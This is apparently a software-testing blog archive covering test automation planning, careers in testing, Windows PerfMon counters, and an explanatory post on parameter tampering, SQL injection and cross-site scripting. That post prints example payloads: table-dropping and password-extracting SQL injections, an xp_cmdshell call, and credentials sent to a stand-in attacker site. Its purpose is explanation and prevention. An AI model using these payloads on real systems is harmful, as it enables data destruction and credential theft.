Friday

Test Automation From the Ground Up By Vasily Shishkin and Yaron Kottler

Introduction

Test automation promises many attractive benefits such as running multiple tests overnight at a click of a button, eliminating mindless work, increasing test coverage, and reducing the cost of testing. So the question is, how to get started?

Deliberation of Merit

The first order of business then is to be sure that test automation is the right decision in your particular case. The initial automation effort can be expensive, especially if the systems have not been designed with test automation in mind (very few of them are…). Before considering automation make sure you can positively respond to ALL the following per-requisites:

  • The systems or applications are relatively stable with no significant redesigns expected in the foreseeable future.
  • The organization has a solid test process in place.
  • The Organization has the right type of person or team in place.
  • The Organization has a defined scope for an initial automation effort.
  • There is an understanding by senior management that test automation is an investment, not a short term solution.
  • There is a return on investment (ROI) analysis demonstrating at least a 50% ROI for a set period.

For an effort to be considered for test automation, it should result in a positive ROI. Since the expected lifespan of testing a system is not always known or can be hard to predict, an attempt at a comprehensive ROI calculation at an early stage will likely miscalculate an actual ROI. A short term ROI estimate (between one to three years) is a safer and easier calculation to make, typically utilizing at least some of the following factors:

  • Length of time to run a predefined test set manually.
  • Cost and availability of support resources necessary for manual test execution.
  • Number of times such test sets are expected to run during the agreed upon period.
  • Expected effort for establishing automation infrastructure (mapping objects, reusable functions…).
  • Expected effort for establishing test automation coverage utilizing above infrastructure.
  • Expected maintenance effort factor between each version or cycles.
  • Expected effort for executing automated tests and investigating results.
  • The value of enabling manual testers to focus mostly on testing new functionality.
  • Estimated value of shortening a test cycle by X days.
  • Estimated value of increased test coverage consistency.
  • Estimated value of knowledge retention.
  • Estimated value of executing additional test types which couldn’t be executed earlier.

A ROI calculation is not enough though; as indicated above you must also ensure that you have a solid test process in place including things like scope, strategy, test types and test levels. Simply put, automated garbage is still garbage, so if you haven’t been able to positively answer the entire automation per-requisites list above, start there. Also, keep in mind that test automation will almost never replace the first round of manual testing of new functionality, but is rather targeted at reducing the cost and risks associated with regression testing. There are cases in which a progressive automation approach enables utilizing test automation for both regression testing and testing of new functionality but it is not recommended for organizations just getting started with test automation.

Once your foundation and preliminary ROI calculations are in place, it is time to run a test automation proof of concept (POC) project.

Test Automaton Proof of Concept (POC)

Phase Duration (small project) Customer Involvement
Determining Scenarios and Learning the Application 1 Day 2-3 Hours
Writing Up the Test Plan 2-3 Days (depends on revisions) 1-4 Hours (Depends on the infrastructure of the customer)
Scripting 1-3 Weeks 5 Hours – to answer whatever questions come up during scripting
Testing 1-3 Weeks (depends on issues found) Best Case scenario: (no problems, testers have access to server hardware) – 3 Hours
Worst Case scenario: (lots of problems, server hardware has to be monitored by customer): practically same as tester
Final Report 1 Day (compile and Present) 1-2 Hours for the presentation

A POC project should start with defining the immediate goals it should meet. While doing so, keep in mind that the POC’s main purpose is not actual automation implementation, but is rather intended to help determine what kind of methods and resources would be required for a successful automation implementation. It is recommended that the POC project take no longer than three to four weeks. It should have a balance between the need to discover the main automation challenges and demonstrating feasibility with the need to support relatively quick decision making. In addition to organization-specific goals, your list of POC goals should include at least some of the following:

  • Verifying test automation feasibility.
  • Exposing technical blocks and challenges.
  • Experimenting with potential solutions and workarounds.
  • Further refining cost estimates and ROI calculations.
  • Experimenting with a number of test automation tools
  • Finalizing a tool selection or at least supporting a selection.
  • Experimenting with a number of test automation approaches (KDT, DDT, TDD, BDD, Progressive automation…) and finalizing an approach or supporting a selection.
  • Helping establish test automation context and an appropriate state of mind at your organization.
  • Defining a detailed 6 month implementation plan with 30, 60, 90 and 180 day targets.

Once your POC goals are in place, start the POC project by educating yourself on available automation approaches and their advantages. Selection of test automation approaches should include reviewing at least some of the following factors:

  • Proficiency of current personnel with each approach and technical tools associated with it.
  • Cost of training for each approach.
  • Depth of knowledge of the system under test required for each approach.
  • Number of personnel who have BOTH the skills required for the approach and the knowledge of the system under test.

When an approach is selected, next consider the tools you will need. Some of the important factors are:

  • Compatibility with the technologies present in the system under test.
  • Compatibility with the technologies planned to be utilized.
  • Compatibility with the test management systems in place.
  • Market prevalence of the tool ( a wider user base facilitates finding experienced users, support groups, and other network effect factors).
  • Quality of tool vendor support.
  • Tool usability.
  • Tool features that simplify script maintenance.
  • Cost of the tool.

Once the tools have been chosen, the next step in a POC project is to establish a detailed Test Automation Implementation Plan. The plan should include a list of reusable business and utility functions to be tested, as well as a detailed automation breakdown. The plan should allow for the distribution of workload, estimation of the timeline, and tracking of progress.

The last topic to consider is technical guidelines, such as: object mapping structures, creation and maintenance processes, and coding conventions.

When all of the preliminary work is finished, it is time to actually implement the selected scenarios on the tools of choice. From these scenarios, a list of encountered and predicted challenges should be generated and solutions for said challenges evaluated. If the challenges prove to be insurmountable, the POC conclusion is that there is no test automation feasibility. Otherwise, the information gathered should enable meeting the POC goals and enable more accurate recalculation of the ROI. If a revised ROI is unacceptable, another POC with an alternative approach or toolset can be performed. Alternatively, this could indicate that test automation might not be a good idea for this system.

Test automation maintenance

If the POC is completed successfully, and the decision to pursue automation is reached, the concern of automation maintenance should become the leading factor throughout your test automation implementation as it will be the major factor in delivering positive ROI. To insure efficiencies, it is important to build a framework that supports minimal and easy maintenance.

A good maintenance process follows this general outline:

  1. Review the list of known changes in the system and conduct a gap analysis.
  2. Create an action list of things to update such as:
    • New objects to map.
    • Existing object maps to update.
    • Object maps to remove.
    • API calls to revise.
    • Changes in system logic to accommodate.
  3. Inform the personnel of the workflow and data set changes.
  4. Upgrade scripts and infrastructure as necessary.
  5. Conduct a manual sanity test to verify that the environment is operational.
  6. Run a full suite of tests and investigate failures to understand if issues are system related or automation related.
  7. In case issues are automation related, fix the automation as needed and add such issues to future gap analysis.

Once maintenance has been completed successfully, automation infrastructure and automation scenarios should be developed to support additional test coverage.

Summary

In this paper, we outline the basic steps of getting started with test automation at your organization. While each organization has different needs and technologies we find that just about every organization can benefit from utilizing test automation and that the above step by step guide will provide a good framework for getting started.

Examples of good candidates

One last thing to keep in mind. When looking at test automation, the following list of areas typically benefit from test automation:

  • Regression tests that are repeated often – a sanity test is a good example of that.
  • Tests of stable functionality that is not expected to change much.
  • Tests that can be completed automatically with no human intervention.
  • Tests which are expensive to run manually.
  • Tests which require multiple user roles to execute.

Contact the Authors

Yaron Kottler: yaronk@qualitestgroup.com
Vasily Shishkin: vasilys@qualitestgroup.com

Thursday

Tip of the day : Finding a software Testing Job

here are many people who would like to get software testing jobs, but they are unsure about how to approach it. This may seem like a dream job where people get to test software including games as part of their work. Most people do not realize the requirements that are needed to get into software testing jobs.

You firstly need to understand a little bit about how software testing works. When software is created it goes through a product life cycle which has a number of different stages. These include things such as specifications, design, coding and user acceptance. When it comes to software testing there is a requirement of an in-depth knowledge of both coding and software design. To get the best software testing job you need strong coding skills and experience with product design.

If you don’t have very much experience in these areas then it is up to you to either attend some type of training course or learn more on your own. This requires you to learn how to code and also how to do your own bug testing. When you have a lot of experience doing this then you will be much more regarded for software testing jobs than if you applied straight out of university.

Even if you have a computer science or computer engineering degree you may not have the necessary experience to apply for software testing jobs. Often in the computer industry it is very important for people to have experience. Experience often counts for much more than qualifications when it comes to hiring for a job. This is true when it comes to software testing jobs.

When you are applying for such jobs you want to make it clear to the employer of the experience you have in this area so that they can get a good idea of how much you really know. When you’re applying for software testing jobs you will be going up against a number of other people who may have a lot of experience and this can be difficult to compete against. That is why it is important for you to learn as much as you can in your own time and study about coding and bug testing yourself.

software testing jobsYou can find a number of software testing books and coding books available to buy that can help you learn more about this area. But when it comes down to getting software testing jobs it is important to have hands-on experience rather than just know theory you read in a book. If you can demonstrate to an employer experience you have had in the software testing industry or even experience you have learnt yourself then this will go a long way to getting you good software testing jobs.

Even if you are not successful applying for software testing jobs the first time, you should keep trying and keep building on your experience. When you apply for a lot of software testing jobs you will get a feel for what type of person they are looking for and also be able to learn from the past interviews as to the best way to present yourself for software testing jobs

Source : http://ejobhub.org/software-testing-jobs/

Tuesday

So you want to be a Software Tester?

Some people decide they want to be a ‘software tester’. Perhaps they know someone who does this, or have seen the role in real life or in a movie or in a book. Or have experienced the result of inadequate testing. Perhaps the concept just ‘sings’ to them. Some of these people have no past in software development, and some have development experience but want to move to the testing area.

And then there are people, like me, who just ‘fall into’ the role. I was doing electrical engineering and we were working on a product which required some programming. As the only person on the team who knew anything about programming, I was ‘volunteered’. And did well, so that the programming area of the business was interested in me. The job offered ‘some programming and some testing’.

Ewww, testing. But at least I would get to do some programming, so I accepted. Turned out there never was any programming, but who cares; I found out I loved testing, and just as important, was really good at it.

Let me burst your bubble here. Testing is not about finding bugs. Oh sure, you will find them, and it is just as satisfying to the tester to find bugs as it was to the developer to generate the code. Testing is about evaluating the quality of the product. If you don’t find serious bugs, the quality can be considered high, and if you do, the quality can be considered low. And you document the bugs found so that the quality can be improved to the desired level.

In fact, testing contributes to Quality Assurance, which in general has as a goal, to

1) Prevent the generation of bugs (through processes, reviews, design tools and coding tools).

2) Discover any bugs which do get in as early as possible (via reviews and testing)

The later in the process you discover a bug, the more trouble and cost to fix (or patch around) it. Thus testing and Quality Assurance are valuable positions which may be attractive to you.
There are a lot of jobs out there for testers. Experienced testers.

So how do you become a Software Tester? One presumes if you already are a tester, you have everything you need to continue testing or move to a new test position. If you are not a tester, then you need to get the credentials which can get you into that testing position.

First of all, there is Education. Learn about what testing is and various ways it can be done. Check out books, online classes, and perhaps courses at local schools. Best is if the education includes hands on experience doing actual testing, but even ‘book learning’ has its place.

Next, there is Certification. ASTQB offers an internationally recognized Software Test certification, the CTFL (Certified Tester, Foundation Level), along with more advanced certifications which are beyond the scope of this article. This is a multiple choice test which can be studied for in a classroom setting (expensive) or online. Note this by itself will not get you a job, but it should give you an advantage.

Finally, and most importantly, there is Experience. This is a hard one. You need experience to get the job, and you need the job to get experience. Classic Catch 22. So maybe you will luck out and find an entry level test position. Don’t hold your breath. You need to be proactive.

Experience testing is experience testing. Look for it everywhere. If there is a class in testing with an actual testing lab, grab it. Volunteer for extra projects through your school, or for unpaid positions (by nonprofit organizations) which involve testing. If you can get an internship, that is of enormous benefit (several of our intern testers went on to test careers with our company and others when they graduated).

If none of that is practical, then look for classes or jobs with a lot of programming. Any time you program, you need to do testing. Treat the testing part of this activity as the ‘most important’ part. Do it and document it in a professional manner; these may provide evidence of your skills to potential employers. Plus, if you get an entry level programming job with a company worth staying with, you might be able to ‘move’ into the testing position you desire.

Finally, do testing as a ‘hobby’. There are not many computerized devices, web sites or software programs out there which have ‘no’ bugs. So, test them. Record the bugs in a professional manner. You may even be able to submit the bug reports to the company which produced them. And there are ‘cloud testing’ organizations out there which accept testers without experience to do real testing, and pay for it (usually per valid bug found).

So you can see, that in today’s market at least, getting to be a Software Tester is not a straight and broad road. But there are paths to that goal, even if they may be narrow and twisty.


Saturday

Windows Perfmon: The Top Ten Counters
One of the things I love about Windows is Performance Monitor a/k/a PerfMon. It's an amazing tool that goes far too often unused - and when it does get used, it is often misinterpreted. So today I'm going to take you on the nickel tour through PerfMon, and the ten counters most valuable to determining overall system health and activity.

To open PerfMon, just go to the Start Menu, choose Run and type perfmon.
Bottleneck analysis

The most common use of PerfMon is to answer the burning question: why is my system running slow?

With the five performance counters listed below, you can quickly get an overall impression of how healthy a system is - and where the problems are, if they exist. The idea here is to pick counters that will be at low or zero values when the system is healthy, and at high values when something is overloaded. A 'perfectly healthy' system would show all counters flatlined at zero. (Perfection is unattainable, so you'll probably never see all of these counters flatlined at zero in real life. The CPU will almost always have a few items in queue.)

Processor utilization
System\Processor Queue Length - number of threads queued and waiting for time on the CPU. Divide this by the number of CPUs in the system. If the answer is less than 10, the system is most likely running well.
Memory utilization
Memory\Pages Input/Sec - The best indicator of whether you are memory-bound, this counter shows the rate at which pages are read from disk to resolve hard page faults. In other words, the number of times the system was forced to retreive something from disk that should have been in RAM. Occasional spikes are fine, but this should generally flatline at zero.
Disk Utilization
PhysicalDisk\Current Disk Queue Length\driveletter - this is probably the single most valuable counter to watch. It shows how many read or write requests are waiting to execute to the disk. For single disks, it should idle at 2-3 or lower, with occasional spikes being okay. For RAID arrays, divide by the number of active spindles in the array; again try for 2-3 or lower. Because a shortage of RAM will tend to beat on the disk, look closely at the Memory\Pages Input/Sec counter if disk queue lengths are high.
Network Utilization
Network Interface\Output Queue Length\nic name - is the number of packets in queue waiting to be sent. If there is a sustained average of more than two packets in queue, you should be looking to resolve a network bottleneck.
Network Interface\Packets Received Errors\nic name - packet errors that kept the TCP/IP stack from delivering packets to higher layers. This value should stay low.
To highlight a particular counter's line on the graph, select that counter in the lower pane. Then click the lightbulb icon on the toolbar above the graph. This will make the line for that counter turn thick and white (or black on some systems - I never found out why this changes).

Pay close attention to the scale column! Perfmon attempts to automatically pick a scale that will magnify or reduce the counter enough to produce a meaningful line on the graph ... but it doesn't always get it right. As an example, Perfmon often chooses to multiply Disk Queue Length by 100. So, you might think the disk queue length is sustained at 10 (bad!) when in fact it's really at 1 (good). If you're not sure, highlight the counter in the lower pane, and watch the Last and Average values just below the graph. In the screenshot below, I modified all of the counters to a scale value of 1.0, then changed the graph's vertical axis to go from 0-10.

To change graph properties (like scale and vertical axis as discussed above), rightclick the graph and choose Properties. There are a number of things to customize here ... fiddle with it until you have a graph that looks good to you.

To get a more detailed explanation of any counter, rightclick anywhere in the perfmon graph and choose Add Counters. Select the counter and object that you are curious about, and click the Explain button.

This screenshot shows a very lightly-loaded XP system, with the Memory\Pages Input/Sec counter highlighted:




All we see here is the Proccessor Queue Length hovering between 1 and 4, and two short spikes of Pages Input/Sec. All other counters are flatlined at zero, which is easy to check by highlighting each of them and watching the values bar underneath the graph. This is a happy system - no problems here!

But if we saw any of the above counters averaging more than 2-4 for long periods of time (except Processor Queue Length: don't worry unless it's above 10 for long lengths of time), we'd be able to conclude that there was a problem with that subsystem. We could then drill down using more detailed counters to see exactly what was causing that subsystem to be overloaded. More detailed analysis is beyond the scope of this article, but if there's enough interest I could do a second article on that. Leave a comment if you're interested!

General activity counters

Well, the system is healthy - and that's good ... but how hard is it working? Is the processor workin' hard, or hardly workin'? How much RAM is in use, how many bytes are being written to or read from the disk or network? The following counters are a good overview of general activity of the system.
Processor utilization
Processor\% Processor Time\_Total - just a handy idea of how 'loaded' the CPU is at any given time. Don't confuse 100% processor utilization with a slow system though - processor queue length, mentioned above, is much better at determining this.
Memory utilization
Process\Working Set\_Total (or per specific process) - this basically shows how much memory is in the working set, or currently allocated RAM.
Memory\Available MBytes - amount of free RAM available to be used by new processes.
Disk Utilization
PhysicalDisk\Bytes/sec\_Total (or per process) - shows the number of bytes per second being written to or read from the disk.
Network Utilization
Network Interface\Bytes Total/Sec\nic name - Measures the number of bytes sent or received.
In the graph below, I added these five counters to my existing 'bottlenecks' graph, and changed the vertical axis to go from 0-100. I highlighted the Working Set\_Total counter, which is currently at about 123 megabytes for the system. Notice how it shows a thick line at the top of the graph - you could assume that it was pegged at 100, if you didn't read the values bar (123,052,03 divided by a million is approximately 123 megabytes).



And ... that's all for now. Hopefully this quick show-and-tell has given you enough information to use PerfMon more usefully in

Wednesday

Parameter Tampering

Parameter Tampering

Parameter tampering is a simple attack targeting the application business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. Attackers can easily modify these parameters to bypass the security mechanisms that rely on them.

Detailed Description

The basic role of Web servers is to serve files. During a Web session, parameters are exchanged between the Web browser and the Web application in order to maintain information about the client's session, eliminating the need to maintain a complex database on the server side. Parameters are passed through the use of URL query strings, form fields and cookies.

A classic example of parameter tampering is changing parameters in form fields. When a user makes selections on an HTML page, they are usually stored as form field values and sent to the Web application as an HTTP request. These values can be pre-selected (combo box, check box, radio button, etc.), free text or hidden. All of these values can be manipulated by an attacker. In most cases this is as simple as saving the page, editing the HTML and reloading the page in the Web browser.

Hidden fields are parameters invisible to the end user, normally used to provide status information to the Web application. For example, consider a products order form that includes the following hidden field:

Modifying this hidden field value will cause the Web application to charge according to the new amount.

Combo boxes, check boxes and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:


Source Account:

Amount:

Destination Account:


An attacker may bypass the need to choose between only two accounts by adding another account into the HTML page source code. The new combo box is displayed in the Web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. If the method is GET, all form parameters and their values will appear in the query string of the next URL the user sees. An attacker may tamper with this query string. For example, consider a Web page that allows an authenticated user to select one of his/her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the Web browser, the following URL is requested:

http://www.mydomain.com/example.asp?accountnumber=12345&debitamount=1

An attacker may change the URL parameters (accountnumber and debitamount) in order to debit another account:

http://www.mydomain.com/example.asp?accountnumber=67891&creditamount=9999

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing Web application that enables the content creator to modify content, while other users can only view content. The Web server checks whether the user that is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

http://www.mydomain.com/getpage.asp?id=77492&mode=readonly

An attacker can modify the mode parameter to readwrite in order to gain authoring permissions for the content.

SQL Injection

SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.

Details

Databases are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL, Web applications interact with databases to dynamically build customized data views for each user. A common example is a Web application that manages products. In one of the Web application's dynamic pages (such as ASP), users are able to enter a product identifier and view the product name and description. The request sent to the database to retrieve the product's name and description is implemented by the following SQL statement.

SELECT ProductName, ProductDescription  FROM Products  WHERE ProductNumber = ProductNumber 

Typically, Web applications use string queries, where the string contains both the query itself and its parameters. The string is built using server-side script languages such as ASP, JSP and CGI, and is then sent to the database server as a single SQL statement. The following example demonstrates an ASP code that generates a SQL query.

sql_query= " SELECT ProductName, ProductDescription  FROM Products  WHERE ProductNumber = " & Request.QueryString("ProductID") 

The call Request.QueryString("ProductID") extracts the value of the Web form variable ProductID so that it can be appended as the SELECT condition.

When a user enters the following URL:

http://www.mydomain.com/products/products.asp?productid=123 

The corresponding SQL query is executed:

SELECT ProductName, ProductDescription  FROM Products  WHERE ProductNumber = 123 

An attacker may abuse the fact that the ProductID parameter is passed to the database without sufficient validation. The attacker can manipulate the parameter's value to build malicious SQL statements. For example, setting the value "123 OR 1=1" to the ProductID variable results in the following URL:

http://www.mydomain.com/products/products.asp?productid=123 or 1=1 

The corresponding SQL Statement is:

SELECT ProductName, Product Description FROM Products WHERE ProductNumber = 123 OR 1=1 

This condition would always be true and all ProductName and ProductDescription pairs are returned. The attacker can manipulate the application even further by inserting malicious commands. For example, an attacker can request the following URL:

http://www.mydomain.com/products/products.asp?productid=123; DROP  TABLE Products 

In this example the semicolon is used to pass the database server multiple statements in a single execution. The second statement is "DROP TABLE Products" which causes SQL Server to delete the entire Products table.

An attacker may use SQL injection to retrieve data from other tables as well. This can be done using the SQL UNION SELECT statement. The UNION SELECT statement allows the chaining of two separate SQL SELECT queries that have nothing in common. For example, consider the following SQL query:

SELECT ProductName, ProductDescription  FROM Products  WHERE ProductID = '123' UNION SELECT Username, Password FROM Users; 

The result of this query is a table with two columns, containing the results of the first and second queries, respectively. An attacker may use this type of SQL injection by requesting the following URL:

http://www.mydomain.com/products/products.asp?productid=123 UNION  SELECT user-name, password FROM USERS 

The security model used by many Web applications assumes that an SQL query is a trusted command. This enables attackers to exploit SQL queries to circumvent access controls, authentication and authorization checks. In some instances, SQL queries may allow access to host operating system level commands. This can be done using stored procedures. Stored procedures are SQL procedures usually bundled with the database server. For example, the extended stored procedure xp_cmdshell executes operating system commands in the context of a Microsoft SQL Server. Using the same example, the attacker can set the value of ProductID to be "123;EXEC master..xp_cmdshell dir--", which returns the list of files in the current directory of the SQL Server process.

Prevention

The most common way of detecting SQL injection attacks is by looking for SQL signatures in the incoming HTTP stream. For example, looking for SQL commands such as UNION, SELECT or xp_. The problem with this approach is the very high rate of false positives. Most SQL commands are legitimate words that could normally appear in the incoming HTTP stream. This will eventually case the user to either disable or ignore any SQL alert reported. In order to overcome this problem to some extent, the product must learn where it should and shouldn't expect SQL signatures to appear. The ability to discern parameter values from the entire HTTP request and the ability to handle various encoding scenarios are a must in this case.

Imperva SecureSphere does much more than that. It observes the SQL communication and builds a profile consisting of all allowed SQL queries. Whenever an SQL injection attack occurs, SecureSphere can detect the unauthorized query sent to the database. SecureSphere can also correlate anomalies on the SQL stream with anomalies on the HTTP stream to accurately detect SQL injection attacks.

Another important capability that SecureSphere introduces is the ability to monitor a user's activity over time and to correlate various anomalies generated by the same user. For example, the occurrence of a certain SQL signature in a parameter value might not be enough to alert for SQL injection attack but the same signature in correlation with error responses or abnormal parameter size of even other signatures may indicate that this is an attempt at SQL injection attack.

Cross-Site Scripting (XSS or CSS)

Cross-Site Scripting

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker.

Details

Web sites today are more complex than ever and often contain dynamic content to enhance the user experience. Dynamic content is achieved through the use of Web applications that can deliver content to a user according to their settings and needs.

While performing different user customizations and tasks, many sites take input parameters from a user and display them back to the user, usually as a response to the same page request. Examples of such behavior include the following.

  • Search engines which present the search term in the title ("Search Results for: search_term")
  • Error messages which contain the erroneous parameter
  • Personalized responses ("Hello, username")

Cross-site scripting attacks occur when an attacker takes advantage of such applications and creates a request with malicious data (such as a script) that is later presented to the user requesting it. The malicious content is usually embedded into a hyperlink, positioned so that the user will come across it in a web site, a Web message board, an email, or an instant message. If the user then follows the link, the malicious data is sent to the Web application, which in turn creates an output page for the user, containing the malicious content. The user, however, is normally unaware of the attack, and assumes the data originates from the Web server itself, leading the user to believe this is valid content from the Web site.

For example, consider a Web application that requires users to log in to visit an authorized area. When users wish to view the authorized area, they provide their username and password, which is then checked against a user database table. Now, assume that this login system contains two pages: Login.asp, which created a form for the users to enter their username and password; and the page CheckCredentials.asp, which checks if the supplied username/password are valid. If the username/password are invalid, CheckCredentials.asp uses (for example), a Response.Redirect to send the user back to Login.asp, including an error message string in the query string . The Response.Redirect call will be something like the following.

Response.Redirect("Login.asp?ErrorMessage=Invalid+username+or+password") 

Then, in Login.asp, the error message query string value would be displayed as follows:

Using this technique, when users attempt to login with an invalid username or password, they are returned to Login.asp and a short message is displayed indicating that their username/password were invalid. By changing the ErrorMessage value, an attacker can embed malicious JavaScript code into the generated page, causing execution of the script on the computer of the user viewing the site. For example, assume that Login.asp is being called using the following URL.

http://www.somesite.com/Login.asp?ErrorMessage=

As in the code for Login.asp, the ErrorMessage query string value will be emitted, producing the following HTML page:

The attacker embedded HTML code into this page in such a way that when users browse this page, their supplied username and password are submitted to the following page.

http://www.hax0r.com/stealPassword.asp 

An attacker can send a link to the contrived page via an email message or a link from some message board site, hoping that a user will click on the link and attempt to login. Of course, by attempting to login, the user will be submitting his username and password to the attacker's site.

Prevention

Cross-site scripting is one of the easiest attacks to detect, yet many Intrusion Prevention Systems fail to do so. The reason why cross-site scripting can be easily detected is that unlike most application level attacks, cross-site scripting can be detected using a signature. The simple text pattern

To accurately detect cross-site scripting attacks the product must know where and when to look for that signature. Most cross-site scripting attacks occur either with error pages or with parameter values. Therefore the product needs to look for cross-site scripting signatures either within parameter values or within requests that return error messages. To look for signatures in parameters values the product must parse the URL correctly and retrieve the value part and then search for the signature on the value while overcoming encoding issues. To look for signatures in pages that return error messages the product needs to know that the specific URL returned an error code. Intrusion Detection and Prevention Systems which are not Web application oriented simply do not implement these very advanced capabilities.

Monday

The Test Lead is inexperienced, is 'stealing' your work and is taking away all the credit. What is the best way to avoid frustration and deal with?

Tip of the day : Finding a software Testing Job

here are many people who would like to get software testing jobs, but they are unsure about how to approach it. This may seem like a dream j...